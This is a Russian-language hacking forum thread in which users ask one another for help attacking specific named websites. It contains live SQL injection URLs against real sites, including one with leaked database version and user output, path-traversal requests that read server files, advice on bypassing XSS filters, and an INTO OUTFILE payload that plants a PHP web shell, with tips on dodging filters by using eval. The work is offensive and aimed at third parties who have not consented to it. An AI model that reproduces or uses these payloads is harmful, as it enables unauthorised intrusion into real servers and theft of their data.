Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,587
    Likes Received:
    405
    Reputations:
    196
    ты пробелы удали из урла
     
  2. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    http://www.cms.it/prodotti.php?lang=eng&pc=-49+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64+--+

    5.0.77-log:cms_it_db_01:cms_it_dba@localhost:redhat-linux-gnu
     
  3. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Какая здесь ветка, кто-нибудь может ответить?

     
  4. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    12
    Reputations:
    5
    на этом сайте нашол пару xss _http://shock-world.com/
    в полях регистрации email и name но они до ужаса бесполезные.
    есть кто поможет дальше прокрутить ? потому что я пока ничего ненашол , но уверен есть там дырки
     
  5. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,600
    Likes Received:
    1,308
    Reputations:
    1,557
    3

    Ваше сообщение слишком короткое. Оно должно быть не менее 4 символов.
     
    1 person likes this.
  6. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,007
    Likes Received:
    996
    Reputations:
    155
    Тогда ищи их, а с вопросами - сюда.
    За тебя никто ничего делать не будет.
     
  7. [stranger]

    [stranger] Member

    Joined:
    2 Feb 2010
    Messages:
    167
    Likes Received:
    29
    Reputations:
    4
    есть сайт с LFI, при чтении /proc/self/environ получается вот что:
    /proc/self/cmdline
    link: http://staltorgmoscow.ru/index.php?option=com_canteen&controller=../../../../../../../proc/self/cmdline%00

    WTF?oO
     
    #16987 [stranger], 8 Jun 2011
    Last edited: 8 Jun 2011
  8. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,600
    Likes Received:
    1,308
    Reputations:
    1,557
    [stranger], ссылка?
     
  9. M1lten

    M1lten New Member

    Joined:
    18 Dec 2010
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0
    Есть xss, выполнить можно только
    Ну или просто
    Символы как:
    Фильтруются.

    Пробовал по разному, и так:
    И просто даже все брал в String.fromCharCode.
    Но все безуспешно. Помогите плиз, правильно составить запрос.
     
  10. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    608
    Reputations:
    1,101
    WTF?oO , файлы находящиеся за корнем отличаются от кодировки файлов находящимся в каталоге сайта т е файлы читаются в кодировке, отличной от их изначальной кодировки. Надо искать что то в пределах сайта/на другом сайте, если есть доступ:
    Code:
    http://staltorgmoscow.ru/index.php?option=com_canteen&controller=../../../robots.txt%00ddd
    Так же можно найти путь к логам, и послать в них данные в кодировке, в которой они читаются и выводятся.
     
  11. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,600
    Likes Received:
    1,308
    Reputations:
    1,557
    Проблема только с чтением данных, которые могут быть изменены клиентом.
    Code:
    http://staltorgmoscow.ru/index.php?option=com_canteen&controller=../../../../../../../proc/self/status%00ddd
    Проще в хостинге зарегаться и посмотреть где логи лежат.
     
  12. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,600
    Likes Received:
    1,308
    Reputations:
    1,557
    M1lten, что именно не получается?
    eval(String.fromCharCode(тут любой нужный JS-код))
     
  13. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,777
    Likes Received:
    848
    Reputations:
    857
    Помогите разобраться вот с этой скулёй.

    Code:
    http://www.biogov.gc.ca/english/LinkSearch.asp?x=732&formAction=keywordsearch&txtSearchKeywords=13\
    Мож есть статья как крутить при алертах
     
    _________________________
  14. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    http://www.biogov.gc.ca/english/view.asp?x=551&mid=135+order+by+15
     
  15. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,777
    Likes Received:
    848
    Reputations:
    857
    Пробовал. Вывода не нашёл.

    Также пробовал через подзапрос

    Code:
    http://www.biogov.gc.ca/english/view.asp?x=551&mid=135+and+1=1+union+select+1
    Так же болт.
     
    _________________________
  16. KosoyRoman

    KosoyRoman Banned

    Joined:
    14 Sep 2008
    Messages:
    51
    Likes Received:
    12
    Reputations:
    -5
    Бразы, кто в курсе нет каким макаром залить шелл через cnstats
     
  17. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    792
    Likes Received:
    349
    Reputations:
    120
    какая версия?
     
  18. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Фильтруется кавычка, как здесь это обойти. В интернете искал, но по этому вопросу ничего не нашел.

    http://www.cityadm.magadan.ru/index.php?cstart=4'+order+by+1+--+&do=cat&category=kotirovka
     
  19. kroŧ

    kroŧ Member

    Joined:
    19 May 2010
    Messages:
    141
    Likes Received:
    33
    Reputations:
    8
    ?id=-512+UnIoN+AlL+sElEcT+1,2,'<?system($_GET[cmd]);?>',4,5,6,7,8+INTO+OUTFILE+'/web3/vhosts/webhosting/news/php.php'--
    выдает Bad Request
    что можно сделать?
     
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886

    сервер ругается, вероятнее на слово $_GET или систем, подставь разные слова/функции смотри что конкретно фильтрует
    пробуй eval($_REQUEST['a']), ну или как то так, в основном именно они не попадают под фильтр
    ---
    да и вообще нах юзать system?
     
    _________________________
    1 person likes this.
Loading...
Thread Status:
Not open for further replies.